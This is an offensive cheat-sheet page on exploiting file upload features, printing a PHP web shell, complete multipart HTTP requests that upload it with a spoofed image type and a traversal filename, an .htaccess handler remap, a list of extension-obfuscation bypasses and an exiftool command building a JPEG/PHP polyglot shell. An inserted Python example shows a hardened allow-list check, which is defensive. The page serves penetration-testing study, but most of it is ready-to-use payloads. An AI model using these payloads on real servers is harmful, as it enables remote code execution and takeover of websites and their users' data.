d4Rk's 1337 h4x0r guide

File uploads


Last updated 3 years ago

  • Heavily inspired by PortSwigger - Web Security Academy

Unrestricted

If there is no validation at all, upload a web shell straight away and request it from the web root. A minimal PHP one-liner runs whatever is passed in the cmd parameter (system() already writes the output to the response, so the echo merely repeats the last line):

<?php echo system($_GET['cmd']); ?>
Any of the PHP command-execution functions will do; they differ only in how the output is returned. Since disable_functions in php.ini often blocks some of them, try another one if the shell returns nothing.

function     description
exec         Runs an external program; returns only the last line of output (pass an array as second argument to collect all lines)
passthru     Runs an external program and writes its raw, binary-safe output directly to the response
shell_exec   Runs a command via the shell and returns the complete output as a string (the backtick operator does the same)
system       Runs an external program, writes its output to the response and returns the last line

Bypass file type validation

If validation relies on the Content-Type of the uploaded part, it can be spoofed: the header is set by the client and says nothing about the actual bytes. Send an image type such as image/jpeg together with the PHP payload, keeping the .php extension so the server still executes the file.

POST /path HTTP/1.1
Host: website.com
Content-Length: 1337
Content-Type: multipart/form-data; boundary=---------------------------41688721411166396114242705702

---------------------------41688721411166396114242705702
Content-Disposition: form-data; name="image"; filename="cmd.php"
Content-Type: image/jpeg

<?php echo system($_GET['cmd']); ?>
---------------------------41688721411166396114242705702--

Upload file to another directory (path traversal)

If the malicious file can be uploaded but the server does not execute scripts in the upload directory (e.g. PHP is disabled under /uploads), try to place it in a directory where it does execute by putting a traversal sequence in the filename. A literal ../ is often stripped, so use a URL-encoded variant such as ..%2f, which a naive filter passes and the server may decode when it joins the upload directory and the filename.

POST /path HTTP/1.1
Host: website.com
Content-Length: 1337
Content-Type: multipart/form-data; boundary=---------------------------41688721411166396114242705702

---------------------------41688721411166396114242705702
Content-Disposition: form-data; name="image"; filename="..%2fcmd.php"
Content-Type: image/jpeg

<?php echo system($_GET['cmd']); ?>
---------------------------41688721411166396114242705702--

Bypass file type filtering

Blacklists of dangerous extensions are usually incomplete. Instead of .php try other extensions the server may still hand to the PHP interpreter, such as .php3, .php4, .php5, .phtml or .phar; .shtml is a different route to code execution, as it is processed by Server Side Includes (SSI) when mod_include is enabled.

If the server honours per-directory configuration (Apache with AllowOverride FileInfo and PHP running as mod_php), upload an .htaccess that maps an otherwise harmless extension to the PHP handler, then upload the shell with that extension. The same idea applies to IIS with an uploaded web.config. Note that with PHP-FPM the mapping is done with SetHandler rather than AddType, and Nginx ignores .htaccess altogether.

AddType application/x-httpd-php .php5

Obfuscating file extensions

Depending on the validation mechanism in place, one of the following variants of the filename may get past it.

  • Case variation, where the check is case-sensitive but the handler mapping is not (Apache mod_mime matches extensions case-insensitively), e.g. cmd.pHp

  • Multiple extensions, where the filter looks only at the last one but the server (e.g. Apache mod_mime with AddHandler) acts on any recognised extension, e.g. cmd.php.jpg

  • URL encoding, where the check runs before the name is decoded, e.g. cmd%2ephp

  • Null byte, where the check sees the whole string but a C-style file API stops at the first NUL (legacy PHP before 5.3.4), e.g. cmd.php%00.jpg

  • Semicolons, where the stored name is truncated at the ; (classic IIS 6 behaviour with cmd.asp;.jpg), e.g. cmd.php;.jpg

  • Multibyte or Unicode encodings of the dot or extension that are normalised to ASCII only after the check

  • Non-recursive filters that strip a banned extension once, so that removing the inner .php leaves a valid one, e.g. cmd.p.phphp
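As an added example (not from the page), the code below models the weak check each item in the list above exploits, the name the server ends up storing, and an allow-list check that rejects every variant. The file names are the ones listed; the fullwidth full stop stands in for the multibyte case, and the stored_name helper mimics common server-side decoding rather than any specific product.

```python
# Added example (not from the page): one naive filter per bypass in the list
# above, the name the server ends up storing, and an allow-list check that
# rejects every variant. stored_name() mimics typical server-side decoding
# (percent-decoding, Unicode normalisation, NUL and ';' truncation), not any
# particular product.
import os
import re
import unicodedata
import urllib.parse

BLACKLIST = {".php", ".phtml", ".phar"}      # incomplete, as real blacklists are
ALLOWED = {".jpg", ".jpeg", ".png", ".gif"}  # what the hardened check accepts
SAFE_BASE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def naive_ext(name: str) -> str:
    """What a naive filter compares: text after the last ASCII dot, untouched."""
    return os.path.splitext(name)[1]


def weak_blacklist(name: str) -> bool:
    """Case-sensitive blacklist on the literal last extension, applied before any
    decoding. True means the upload is accepted."""
    return naive_ext(name) not in BLACKLIST


def weak_strip_once(name: str) -> str:
    """'Sanitiser' that deletes a banned extension, but only its first occurrence."""
    return name.replace(".php", "", 1)


def stored_name(name: str) -> str:
    """Name the storage layer ends up using: percent-decoded (cmd%2ephp -> cmd.php),
    NFKC-normalised (fullwidth dot -> '.'), cut at the first NUL (C string APIs,
    PHP < 5.3.4) and at ';' (IIS 6 style)."""
    name = urllib.parse.unquote(name)
    name = unicodedata.normalize("NFKC", name)
    name = name.split("\x00", 1)[0]
    return name.split(";", 1)[0]


def hardened_check(raw_name: str) -> bool:
    """Allow-list check on the name that will actually be written. Rejects anything
    that decoding or normalisation changes, path separators, dots in the base name
    (double extensions) and every extension outside ALLOWED, compared case-insensitively.
    Servers should still store under a generated name and keep only this extension."""
    name = stored_name(raw_name)
    if name != raw_name or "/" in name or "\\" in name:
        return False
    base, ext = os.path.splitext(name)
    return bool(SAFE_BASE.match(base)) and ext.lower() in ALLOWED


def demo() -> dict:
    """For each variant: (weak filter accepts it, name that ends up on disk,
    hardened check accepts it)."""
    cases = {
        "case":        "cmd.pHp",          # Apache mod_mime matches extensions case-insensitively
        "double_ext":  "cmd.php.jpg",      # Apache AddHandler acts on any recognised extension
        "url_encoded": "cmd%2ephp",
        "null_byte":   "cmd.php%00.jpg",
        "semicolon":   "cmd.php;.jpg",
        "multibyte":   "cmd\uff0ephp",     # U+FF0E FULLWIDTH FULL STOP, NFKC -> "."
        "legit":       "photo.JPG",
    }
    result = {label: (weak_blacklist(n), stored_name(n), hardened_check(n))
              for label, n in cases.items()}
    stripped = weak_strip_once("cmd.p.phphp")
    result["strip_once"] = (stripped == "cmd.php", stripped, hardened_check("cmd.p.phphp"))
    return result


if __name__ == "__main__":
    for label, (weak_ok, on_disk, hard_ok) in demo().items():
        print(f"{label:12} weak={weak_ok!s:5} stored={on_disk!r:18} hardened={hard_ok}")
```

The point of hardened_check is the order of operations: it validates the name after the same decoding the storage layer applies, refuses anything that decoding changed, and compares against a short allow-list of lower-cased extensions; every variant in the list above then fails while photo.JPG still passes.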

Polyglot (php/jpg)

E.g. use exiftool to write the PHP code into the JPEG comment (COM) segment. The output still begins with the JPEG magic bytes FF D8 FF and keeps a valid marker structure, so it passes magic-byte and getimagesize()-style checks, while the PHP interpreter emits the binary parts verbatim and executes the embedded <?php ... ?> block once the server runs the file as PHP (which still requires a .php extension or one of the tricks above).

exiftool -Comment="<?php echo system($_GET['cmd']); ?>" image.jpg -o polyglot.php